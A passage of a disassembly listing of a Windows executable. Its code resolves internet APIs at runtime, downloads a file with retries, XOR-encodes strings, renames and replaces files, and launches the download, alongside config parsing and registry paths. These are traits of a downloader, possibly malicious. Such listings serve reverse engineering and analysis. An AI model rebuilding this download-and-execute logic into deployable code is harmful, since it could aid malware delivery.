cmp [ebp+var_1C], 0
jnz short loc_422808
xor eax, eax
jmp loc_4229EA
; ---------------------------------------------------------------------------
loc_422808: ; CODE XREF: sub_4227A4+5B�j
push offset aInternetopena ; "InternetOpenA"
mov ecx, [ebp+var_1C]
push ecx
call dword_433060 ; GetProcAddress
mov [ebp+var_202C], eax
push offset aInternetopenur ; "InternetOpenUrlA"
mov edx, [ebp+var_1C]
push edx
call dword_433060 ; GetProcAddress
mov [ebp+var_8], eax
push offset aInternetcloseh ; "InternetCloseHandle"
mov eax, [ebp+var_1C]
push eax
call dword_433060 ; GetProcAddress
mov [ebp+var_10], eax
push offset aInternetreadfi ; "InternetReadFile"
mov ecx, [ebp+var_1C]
push ecx
call dword_433060 ; GetProcAddress
mov [ebp+var_18], eax
mov edx, [ebp+var_2034]
mov dword ptr [edx+4], 0
mov [ebp+var_20], 0
mov [ebp+var_2024], 0
mov [ebp+var_C], 0
push 0
push 0
push 0
push 1
push 0
call [ebp+var_202C]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_422898
xor eax, eax
jmp loc_4229EA
; ---------------------------------------------------------------------------
loc_422898: ; CODE XREF: sub_4227A4+EB�j
push 0
push 9
push 0
push 0
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_20]
push ecx
call [ebp+var_8]
mov [ebp+var_2024], eax
cmp [ebp+var_2024], 0
jnz short loc_4228C1
xor eax, eax
jmp loc_4229EA
; ---------------------------------------------------------------------------
loc_4228C1: ; CODE XREF: sub_4227A4+114�j
mov [ebp+var_2028], 2000h
mov [ebp+var_4], 0
mov edx, [ebp+var_2034]
cmp dword ptr [edx+4], 0
jz short loc_4228FB
mov eax, [ebp+var_2034]
mov ecx, [eax+4]
push ecx
call dword_43304C ; GlobalFree
mov edx, [ebp+var_2034]
mov dword ptr [edx+4], 0
loc_4228FB: ; CODE XREF: sub_4227A4+138�j
push 0
push 40h
call dword_43305C ; GlobalAlloc
mov ecx, [ebp+var_2034]
mov [ecx+4], eax
loc_42290E: ; CODE XREF: sub_4227A4+1F9�j
lea edx, [ebp+var_14]
push edx
push 1FFFh
lea eax, [ebp+var_2020]
push eax
mov ecx, [ebp+var_2024]
push ecx
call [ebp+var_18]
test eax, eax
jz short loc_4229A2
cmp [ebp+var_14], 0
jnz short loc_422934
jmp short loc_4229A2
; ---------------------------------------------------------------------------
loc_422934: ; CODE XREF: sub_4227A4+18C�j
mov edx, [ebp+var_14]
mov [ebp+edx+var_2020], 0
cmp [ebp+var_14], 2000h
jnb short loc_422952
mov [ebp+var_2030], 0
loc_422952: ; CODE XREF: sub_4227A4+1A2�j
push 2
mov eax, [ebp+var_4]
add eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_2034]
mov edx, [ecx+4]
push edx
call dword_433058 ; GlobalReAlloc
mov ecx, [ebp+var_2034]
mov [ecx+4], eax
mov edx, [ebp+var_14]
push edx
lea eax, [ebp+var_2020]
push eax
mov ecx, [ebp+var_2034]
mov edx, [ecx+4]
add edx, [ebp+var_4]
push edx
call sub_431764 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
add eax, [ebp+var_14]
mov [ebp+var_4], eax
jmp loc_42290E
; ---------------------------------------------------------------------------
loc_4229A2: ; CODE XREF: sub_4227A4+186�j
; sub_4227A4+18E�j
cmp [ebp+var_20], 0
jz short loc_4229AF
mov ecx, [ebp+var_20]
push ecx
call [ebp+var_10]
loc_4229AF: ; CODE XREF: sub_4227A4+202�j
cmp [ebp+var_2024], 0
jz short loc_4229C2
mov edx, [ebp+var_2024]
push edx
call [ebp+var_10]
loc_4229C2: ; CODE XREF: sub_4227A4+212�j
cmp [ebp+var_C], 0
jz short loc_4229CF
mov eax, [ebp+var_C]
push eax
call [ebp+var_10]
loc_4229CF: ; CODE XREF: sub_4227A4+222�j
mov ecx, [ebp+var_1C]
push ecx
call dword_433054 ; FreeLibrary
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2034]
mov ecx, [eax+4]
mov [edx], ecx
mov eax, [ebp+var_4]
loc_4229EA: ; CODE XREF: sub_4227A4+1B�j
; sub_4227A4+5F�j ...
mov esp, ebp
pop ebp
retn 8
sub_4227A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229F0 proc near ; DATA XREF: HLXc:off_4332DC�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_4226C7
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_422A15
mov ecx, [ebp+var_4]
push ecx
call sub_43161E
add esp, 4
loc_422A15: ; CODE XREF: sub_4229F0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_4229F0 endp
; =============== S U B R O U T I N E =======================================
sub_422A1E proc near ; CODE XREF: sub_4298B0+34�p
mov eax, offset loc_431D1B
call sub_43176A ; _EH_prolog
sub esp, 288h
push ebx
push esi
mov esi, ecx
push edi
mov [ebp-1Ch], esi
call sub_43164E
and dword ptr [ebp-4], 0
lea ecx, [esi+4]
call sub_43164E
lea ebx, [esi+8]
mov byte ptr [ebp-4], 1
mov ecx, ebx
call sub_43164E
lea ecx, [esi+10h]
mov byte ptr [ebp-4], 2
call sub_43164E
lea ecx, [esi+14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea edi, [esi+1Ch]
mov byte ptr [ebp-4], 4
mov ecx, edi
call sub_43164E
lea ecx, [esi+20h]
mov byte ptr [ebp-4], 5
call sub_43164E
lea ecx, [esi+24h]
mov byte ptr [ebp-4], 6
call sub_43164E
lea ecx, [esi+202Ch]
mov byte ptr [ebp-4], 7
call sub_4226B0
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 8
call sub_43164E
lea eax, [ebp-294h]
push 127h
push eax
mov byte ptr [ebp-4], 9
call dword_4330D4 ; GetWindowsDirectoryA
lea eax, [ebp-16Ch]
push 104h
push eax
push 0
call dword_4330D8 ; GetModuleFileNameA
lea eax, [ebp-294h]
mov ecx, edi
push eax
call sub_43163C
mov edi, dword_4330E0
push 22h
call edi ; Sleep
lea eax, [ebp-16Ch]
lea ecx, [esi+20h]
push eax
call sub_43163C
lea eax, [ebp-44h]
push 1
push eax
mov ecx, esi
call sub_424AE5
lea eax, [ebp-44h]
mov ecx, ebx
push eax
call sub_43163C
push 26h
call edi ; Sleep
push 49h
lea eax, [ebp-18h]
push offset aD_0 ; "%d"
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
push 27h
call edi ; Sleep
lea eax, [ebp-18h]
mov ecx, esi
push eax
call sub_43163C
push ecx
mov eax, esp
mov [ebp-10h], esp
push esi
push ebx
push eax
call sub_431654
lea eax, [ebp-10h]
mov ecx, esi
push eax
call sub_422F54
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 0Ah
call sub_431648
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 9
call sub_431642
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-10h], esp
push eax
call sub_431636
mov ecx, esi
call sub_4256EA
test al, al
jz short loc_422B90
mov byte ptr [esi+18h], 1
jmp short loc_422B94
; ---------------------------------------------------------------------------
loc_422B90: ; CODE XREF: sub_422A1E+16A�j
push 27h
call edi ; Sleep
loc_422B94: ; CODE XREF: sub_422A1E+170�j
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 8
call sub_431642
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn
sub_422A1E endp
; =============== S U B R O U T I N E =======================================
sub_422BB1 proc near ; CODE XREF: sub_429830+4D�p
; HLXc:004326C2�p ...
mov eax, offset loc_431D7D
call sub_43176A ; _EH_prolog
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
push 0
mov dword ptr [ebp-4], 7
call dword_4332A8
lea ecx, [esi+202Ch]
call sub_4226C7
lea ecx, [esi+24h]
mov byte ptr [ebp-4], 6
call sub_431642
lea ecx, [esi+20h]
mov byte ptr [ebp-4], 5
call sub_431642
lea ecx, [esi+1Ch]
mov byte ptr [ebp-4], 4
call sub_431642
lea ecx, [esi+14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [esi+10h]
mov byte ptr [ebp-4], 2
call sub_431642
lea ecx, [esi+8]
mov byte ptr [ebp-4], 1
call sub_431642
and byte ptr [ebp-4], 0
lea ecx, [esi+4]
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_431642
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_422BB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C48 proc near ; CODE XREF: sub_422E6E+30�p
var_1844 = byte ptr -1844h
var_1044 = byte ptr -1044h
var_844 = byte ptr -844h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1844h
call sub_431700
push ebx
mov ebx, dword_4330CC
push esi
push edi
push [ebp+arg_8]
lea eax, [ebp+var_844]
mov [ebp+var_4], ecx
push eax
call ebx ; lstrcpyA
push [ebp+arg_C]
mov esi, dword_433078
lea eax, [ebp+var_844]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_844]
push offset a_bin ; ".bin"
push eax
call esi ; lstrcatA
push [ebp+arg_8]
lea eax, [ebp+var_1844]
push eax
call ebx ; lstrcpyA
push [ebp+arg_C]
lea eax, [ebp+var_1844]
push eax
call esi ; lstrcatA
cmp byte ptr [ebp+arg_14], 0
mov [ebp+arg_C], 3
mov [ebp+var_8], 1
jz short loc_422CBD
and [ebp+var_8], 0
loc_422CBD: ; CODE XREF: sub_422C48+6F�j
push ecx
mov ecx, esp
mov [ebp+arg_14], esp
push offset aInstallzip ; "InstallZip()\n"
call sub_43162A
mov ecx, [ebp+var_4]
call sub_424AD9
mov edi, dword_4330E0
loc_422CDB: ; CODE XREF: sub_422C48+F1�j
lea eax, [ebp+var_844]
push eax
mov eax, [ebp+var_4]
push [ebp+arg_0]
lea ecx, [eax+202Ch]
call sub_4226DB
test al, al
jz short loc_422D2B
lea eax, [ebp+var_844]
push eax
call sub_4221DB
test eax, eax
pop ecx
jz short loc_422D2B
cmp [ebp+arg_1C], 0
jz short loc_422D44
push [ebp+arg_1C]
push ecx
mov ecx, esp
mov [ebp+arg_14], esp
push [ebp+arg_8]
call sub_43162A
mov ecx, [ebp+var_4]
call sub_424A53
cmp al, 1
jz short loc_422D44
loc_422D2B: ; CODE XREF: sub_422C48+AD�j
; sub_422C48+BE�j
dec [ebp+arg_C]
push 0EA82h
call edi ; Sleep
cmp [ebp+arg_C], 0
jnz short loc_422CDB
loc_422D3B: ; CODE XREF: sub_422C48+1AB�j
xor al, al
loc_422D3D: ; CODE XREF: sub_422C48+221�j
pop edi
pop esi
pop ebx
leave
retn 24h
; ---------------------------------------------------------------------------
loc_422D44: ; CODE XREF: sub_422C48+C4�j
; sub_422C48+E1�j
push [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ebp+var_844]
push eax
call sub_4249D2
test al, al
jz loc_422E67
cmp [ebp+arg_10], 0
jz loc_422E67
push [ebp+arg_8]
call sub_4221DB
test eax, eax
pop ecx
jz short loc_422DC3
push [ebp+arg_8]
lea eax, [ebp+var_1044]
push eax
call ebx ; lstrcpyA
lea eax, [ebp+var_1044]
push offset a_old ; ".old"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_1044]
push 1
push eax
push [ebp+arg_8]
call sub_421D8A
lea eax, [ebp+var_1044]
push eax
call sub_4221DB
add esp, 10h
test eax, eax
jz short loc_422DC3
lea eax, [ebp+var_1044]
push 1
push eax
call sub_421C92
pop ecx
pop ecx
loc_422DC3: ; CODE XREF: sub_422C48+12B�j
; sub_422C48+169�j
lea eax, [ebp+var_844]
push eax
call sub_4221DB
test eax, eax
pop ecx
jz short loc_422DE4
lea eax, [ebp+var_844]
push 1
push eax
call sub_421C92
pop ecx
pop ecx
loc_422DE4: ; CODE XREF: sub_422C48+18A�j
lea eax, [ebp+var_1844]
push eax
call sub_4221DB
test eax, eax
pop ecx
jz loc_422D3B
push 2Bh
call edi ; Sleep
push 45h
call edi ; Sleep
push 3Ch
lea eax, [ebp+var_44]
pop esi
push esi
push 0
push eax
call sub_431752 ; memset
lea eax, [ebp+var_1844]
add esp, 0Ch
mov [ebp+var_34], eax
mov eax, [ebp+arg_4]
mov [ebp+var_30], eax
mov eax, [ebp+var_8]
push 67h
mov [ebp+var_44], esi
mov [ebp+var_38], offset aOpen ; "OPEN"
mov [ebp+var_28], eax
call edi ; Sleep
push 0B3h
mov [ebp+var_40], 40h
call edi ; Sleep
cmp [ebp+arg_C], 0
jle short loc_422E67
mov ecx, [ebp+var_4]
lea eax, [ebp+var_44]
push eax
call sub_4263D6
cmp [ebp+arg_18], 0
jz short loc_422E67
push 0FFFFFFFFh
push [ebp+var_C]
call dword_4330D0 ; WaitForSingleObject
loc_422E67: ; CODE XREF: sub_422C48+110�j
; sub_422C48+11A�j ...
mov al, 1
jmp loc_422D3D
sub_422C48 endp
; =============== S U B R O U T I N E =======================================
sub_422E6E proc near ; CODE XREF: sub_4245AA+262�p
mov eax, offset loc_431D88
call sub_43176A ; _EH_prolog
push ecx
push ebx
push esi
push edi
and dword ptr [ebp-4], 0
mov [ebp-10h], esp
push dword ptr [ebp+28h]
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_422C48
test al, al
setnz al
jmp short loc_422EB2
; ---------------------------------------------------------------------------
loc_422EAA: ; DATA XREF: HLXc:00434FA4�o
mov eax, offset loc_422EB0
retn
; ---------------------------------------------------------------------------
loc_422EB0: ; DATA XREF: sub_422E6E:loc_422EAA�o
xor al, al
loc_422EB2: ; CODE XREF: sub_422E6E+3A�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 24h
sub_422E6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422EC3 proc near ; CODE XREF: sub_42852F+6D9�p
var_868 = byte ptr -868h
var_68 = byte ptr -68h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 868h
push ebx
push esi
push edi
mov esi, dword_4330CC
push 3
lea eax, [ebp+var_868]
pop edi
mov ebx, ecx
push [ebp+arg_0]
push eax
call esi ; lstrcpyA
add ebx, 202Ch
loc_422EEC: ; CODE XREF: sub_422EC3+85�j
push [ebp+arg_4]
lea eax, [ebp+var_868]
mov ecx, ebx
push eax
call sub_4227A4
test eax, eax
mov [ebp+var_4], eax
jbe short loc_422F06
xor edi, edi
loc_422F06: ; CODE XREF: sub_422EC3+3F�j
test edi, edi
jz short loc_422F4A
dec edi
lea eax, [ebp+var_68]
push edi
push offset aRetryD ; "&retry=%d"
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
lea eax, [ebp+var_868]
push [ebp+arg_0]
push eax
call esi ; lstrcpyA
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_868]
push eax
call dword_433078 ; lstrcatA
push 49402h
call dword_4330E0 ; Sleep
test edi, edi
jnz short loc_422EEC
loc_422F4A: ; CODE XREF: sub_422EC3+45�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn 8
sub_422EC3 endp
; =============== S U B R O U T I N E =======================================
sub_422F54 proc near ; CODE XREF: sub_422A1E+134�p
; sub_4245AA+F9�p ...
mov eax, offset loc_431DBB
call sub_43176A ; _EH_prolog
mov eax, 4010h
call sub_431700
and dword ptr [ebp-1Ch], 0
push ebx
push esi
push edi
mov dl, ds:byte_439CA0
mov esi, 7FFh
mov ecx, esi
xor eax, eax
lea edi, [ebp-201Bh]
mov [ebp-201Ch], dl
rep stosd
stosw
stosb
mov ecx, esi
xor eax, eax
lea edi, [ebp-401Bh]
mov [ebp-401Ch], dl
rep stosd
stosw
lea ecx, [ebp-10h]
mov dword ptr [ebp-4], 1
stosb
call sub_43164E
push offset dword_4370EC
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 2
call sub_43163C
mov eax, [ebp+0Ch]
xor esi, esi
mov ebx, [eax-8]
test ebx, ebx
jle short loc_423013
mov edi, [ebp-10h]
mov [ebp-14h], eax
lea eax, [ebp-201Ch]
sub [ebp-14h], eax
loc_422FDF: ; CODE XREF: sub_422F54+BD�j
test esi, esi
jle short loc_422FF8
mov ecx, [edi-8]
mov eax, esi
cdq
idiv ecx
test eax, eax
mov eax, esi
jle short loc_422FFA
cdq
idiv ecx
mov eax, edx
jmp short loc_422FFA
; ---------------------------------------------------------------------------
loc_422FF8: ; CODE XREF: sub_422F54+8D�j
mov eax, esi
loc_422FFA: ; CODE XREF: sub_422F54+9B�j
; sub_422F54+A2�j
mov edx, [ebp-14h]
mov al, [eax+edi]
lea ecx, [ebp+esi-201Ch]
mov dl, [edx+ecx]
xor al, dl
inc esi
cmp esi, ebx
mov [ecx], al
jl short loc_422FDF
loc_423013: ; CODE XREF: sub_422F54+7A�j
xor esi, esi
test ebx, ebx
jle short loc_42304D
loc_423019: ; CODE XREF: sub_422F54+F7�j
movzx eax, byte ptr [ebp+esi-201Ch]
push eax
lea eax, [ebp-16h]
push offset a02x ; "%02X"
push eax
call dword_4331E0 ; sprintf
lea eax, [ebp-16h]
push eax
lea eax, [ebp-401Ch]
push eax
call sub_431770 ; strcat
mov eax, [ebp+0Ch]
add esp, 14h
inc esi
cmp esi, [eax-8]
jl short loc_423019
loc_42304D: ; CODE XREF: sub_422F54+C3�j
push offset byte_439CA0
lea ecx, [ebp+0Ch]
call sub_43163C
mov ecx, [ebp+8]
lea eax, [ebp-401Ch]
push eax
call sub_43162A
mov dword ptr [ebp-1Ch], 1
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_431642
and byte ptr [ebp-4], 0
lea ecx, [ebp+0Ch]
call sub_431642
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 8
sub_422F54 endp
; =============== S U B R O U T I N E =======================================
sub_42309C proc near ; CODE XREF: sub_424AE5+F3�p
; sub_424AE5+142�p ...
mov eax, offset loc_431DF7
call sub_43176A ; _EH_prolog
mov eax, 6018h
call sub_431700
mov dl, ds:byte_439CA0
push ebx
push esi
mov [ebp-20h], ecx
mov esi, 7FFh
push edi
mov ecx, esi
xor eax, eax
lea edi, [ebp-4023h]
mov [ebp-4024h], dl
rep stosd
stosw
stosb
mov ecx, esi
xor eax, eax
lea edi, [ebp-2023h]
mov [ebp-2024h], dl
rep stosd
stosw
xor ebx, ebx
lea ecx, [ebp-10h]
mov [ebp-1Ch], ebx
stosb
call sub_43164E
lea ecx, [ebp-18h]
mov dword ptr [ebp-4], 1
call sub_43164E
push 67h
mov byte ptr [ebp-4], 2
call dword_4330E0 ; Sleep
mov esi, [ebp+10h]
lea eax, [esi+1]
push eax
lea eax, [ebp-6024h]
push dword ptr [ebp+0Ch]
push eax
call dword_4330C8 ; lstrcpynA
push offset dword_4370EC
lea ecx, [ebp-10h]
call sub_43163C
mov [ebp+10h], esi
xor edi, edi
shr dword ptr [ebp+10h], 1
jz loc_4231D5
loc_423145: ; CODE XREF: sub_42309C+133�j
test ebx, ebx
jle short loc_423161
mov eax, [ebp-10h]
mov ecx, [eax-8]
mov eax, edi
cdq
idiv ecx
test eax, eax
jle short loc_423161
mov eax, edi
cdq
idiv ecx
mov esi, edx
jmp short loc_423163
; ---------------------------------------------------------------------------
loc_423161: ; CODE XREF: sub_42309C+AB�j
; sub_42309C+BA�j
mov esi, edi
loc_423163: ; CODE XREF: sub_42309C+C3�j
push 2
lea eax, [ebp-6024h]
push ebx
push eax
lea eax, [ebp+0Ch]
lea ecx, [ebp-24h]
push eax
call sub_421ACF
push eax
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 3
call sub_431648
lea ecx, [ebp+0Ch]
mov byte ptr [ebp-4], 2
call sub_431642
push dword ptr [ebp-18h]
mov ecx, [ebp-20h]
call sub_42322C
mov ecx, [ebp-10h]
movsx ecx, byte ptr [esi+ecx]
xor eax, ecx
push eax
lea eax, [ebp-12h]
push offset dword_4370FC
push eax
call dword_4331E0 ; sprintf
lea eax, [ebp-12h]
push eax
lea eax, [ebp-2024h]
push eax
call sub_431770 ; strcat
add esp, 14h
inc edi
inc ebx
inc ebx
cmp edi, [ebp+10h]
jb loc_423145
loc_4231D5: ; CODE XREF: sub_42309C+A3�j
lea eax, [ebp-2024h]
push eax
lea eax, [ebp-4024h]
push eax
call sub_431758 ; strcpy
pop ecx
lea eax, [ebp-4024h]
pop ecx
mov ecx, [ebp+8]
push eax
call sub_43162A
mov dword ptr [ebp-1Ch], 1
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_431642
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 0Ch
sub_42309C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42322C proc near ; CODE XREF: sub_42309C+FC�p
var_80 = byte ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
and [ebp+var_7C], 0
push ebx
push esi
push edi
push [ebp+arg_0]
mov [ebp+var_80], 30h
mov [ebp+var_78], 31h
mov [ebp+var_74], 1
mov [ebp+var_70], 32h
mov [ebp+var_6C], 2
mov [ebp+var_68], 33h
mov [ebp+var_64], 3
mov [ebp+var_60], 34h
mov [ebp+var_5C], 4
mov [ebp+var_58], 35h
mov [ebp+var_54], 5
mov [ebp+var_50], 36h
mov [ebp+var_4C], 6
mov [ebp+var_48], 37h
mov [ebp+var_44], 7
mov [ebp+var_40], 38h
mov [ebp+var_3C], 8
mov [ebp+var_38], 39h
mov [ebp+var_34], 9
mov [ebp+var_30], 41h
mov [ebp+var_2C], 0Ah
mov [ebp+var_28], 42h
mov [ebp+var_24], 0Bh
mov [ebp+var_20], 43h
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], 44h
mov [ebp+var_14], 0Dh
mov [ebp+var_10], 45h
mov [ebp+var_C], 0Eh
mov [ebp+var_8], 46h
mov [ebp+var_4], 0Fh
call dword_4331B0 ; _strdup
push eax
call dword_4331B4 ; _mbsupr
pop ecx
xor esi, esi
cmp byte ptr [eax], 30h
pop ecx
mov edx, eax
jnz short loc_423309
cmp byte ptr [eax+1], 58h
jnz short loc_423309
lea edx, [eax+2]
loc_423309: ; CODE XREF: sub_42322C+D2�j
; sub_42322C+D8�j
mov byte ptr [ebp+arg_0+3], 1
loc_42330D: ; CODE XREF: sub_42322C+10D�j
mov cl, [edx]
test cl, cl
jz short loc_42333B
xor edi, edi
lea ebx, [ebp+var_80]
loc_423318: ; CODE XREF: sub_42322C+F9�j
cmp cl, [ebx]
jz short loc_423327
inc edi
add ebx, 8
cmp edi, 10h
jge short loc_42333B
jmp short loc_423318
; ---------------------------------------------------------------------------
loc_423327: ; CODE XREF: sub_42322C+EE�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_423330
shl esi, 4
loc_423330: ; CODE XREF: sub_42322C+FF�j
or esi, [ebp+edi*8+var_7C]
inc edx
and byte ptr [ebp+arg_0+3], 0
jmp short loc_42330D
; ---------------------------------------------------------------------------
loc_42333B: ; CODE XREF: sub_42322C+E5�j
; sub_42322C+F7�j
push eax
call dword_4331D4 ; free
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
sub_42322C endp
; =============== S U B R O U T I N E =======================================
sub_42334C proc near ; CODE XREF: sub_42852F+9EE�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
push ebp
push esi
mov esi, ecx
push edi
push ecx
mov ecx, esp
mov [esp+18h+var_4], esp
push offset dword_437100
call sub_43162A
mov ecx, esi
call sub_424AD9
mov eax, [esp+14h+arg_4]
xor ebx, ebx
cmp eax, ebx
jle loc_423425
mov ecx, [esp+14h+arg_0]
mov edi, dword_4330CC
mov [esp+14h+arg_4], eax
mov ebp, offset byte_439CA0
lea esi, [ecx+4000h]
loc_423392: ; CODE XREF: sub_42334C+D3�j
lea eax, [esi-4000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi-2000h]
push ebp
push eax
call edi ; lstrcpyA
push ebp
push esi
call edi ; lstrcpyA
lea eax, [esi+2000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+4000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+6000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+0E000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+0A000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+8000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+0C000h]
push ebp
push eax
call edi ; lstrcpyA
mov [esi+10001h], bl
mov byte ptr [esi+10002h], 1
mov [esi+10003h], bl
mov [esi+10004h], bl
mov [esi+10000h], bl
mov [esi+10008h], ebx
add esi, 1400Ch
dec [esp+14h+arg_4]
jnz loc_423392
loc_423425: ; CODE XREF: sub_42334C+27�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
sub_42334C endp
; =============== S U B R O U T I N E =======================================
sub_42342D proc near ; CODE XREF: sub_42852F+A23�p
mov eax, offset loc_431F3D
call sub_43176A ; _EH_prolog
mov eax, 2134h
call sub_431700
push ebx
push esi
push edi
mov [ebp-28h], ecx
xor ebx, ebx
mov [ebp-4], ebx
mov [ebp-24h], ebx
mov [ebp-14h], ebx
push ecx
mov byte ptr [ebp-4], 1
mov ecx, esp
mov [ebp-2Ch], esp
push offset aParsexml ; "ParseXML()\n"
call sub_43162A
mov ecx, [ebp-28h]
call sub_424AD9
cmp [ebp+8], ebx
jnz short loc_42347D
push 80004003h
call sub_431952
loc_42347D: ; CODE XREF: sub_42342D+44�j
mov ecx, [ebp+8]
lea eax, [ebp-1Ch]
push eax
call sub_42438B
push dword ptr [eax]
lea ecx, [ebp-14h]
call sub_4264AF
lea ecx, [ebp-1Ch]
call sub_4264A2
mov edi, offset aS ; "%s"
loc_4234A0: ; CODE XREF: sub_42342D+CA3�j
push ebx
lea ecx, [ebp-14h]
call sub_4264DA
test al, al
jnz loc_4240D5
push offset aConfigversio_0 ; "configversion"
lea ecx, [ebp-0C0h]
call sub_4240F6
mov esi, eax
cmp [ebp-14h], ebx
mov byte ptr [ebp-4], 2
jnz short loc_4234D6
push 80004003h
call sub_431952
loc_4234D6: ; CODE XREF: sub_42342D+9D�j
mov ecx, [ebp-14h]
lea eax, [ebp-84h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-84h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0C0h]
mov byte ptr [ebp-4], 1
call sub_42414A
test bl, bl
jz loc_4235D7
cmp dword ptr [ebp-14h], 0
jnz short loc_423527
push 80004003h
call sub_431952
loc_423527: ; CODE XREF: sub_42342D+EE�j
mov ecx, [ebp-14h]
lea eax, [ebp-0D0h]
push eax
call sub_4243EF
mov ecx, [eax]
mov byte ptr [ebp-4], 3
test ecx, ecx
jz short loc_423547
call sub_4241E8
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_423547: ; CODE XREF: sub_42342D+111�j
xor eax, eax
loc_423549: ; CODE XREF: sub_42342D+118�j
push eax
lea eax, [ebp-2140h]
push edi
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
lea ecx, [ebp-0D0h]
mov byte ptr [ebp-4], 1
call sub_42414A
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-0C8h], esp
push offset byte_439CA0
call sub_43162A
push ecx
mov byte ptr [ebp-4], 4
mov ecx, esp
mov [ebp-20h], esp
push offset aWrConfigversio ; "WR\\configversion"
call sub_43162A
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 1
call sub_42692B
push ecx
lea eax, [ebp-2140h]
mov ecx, esp
mov [ebp-20h], esp
push eax
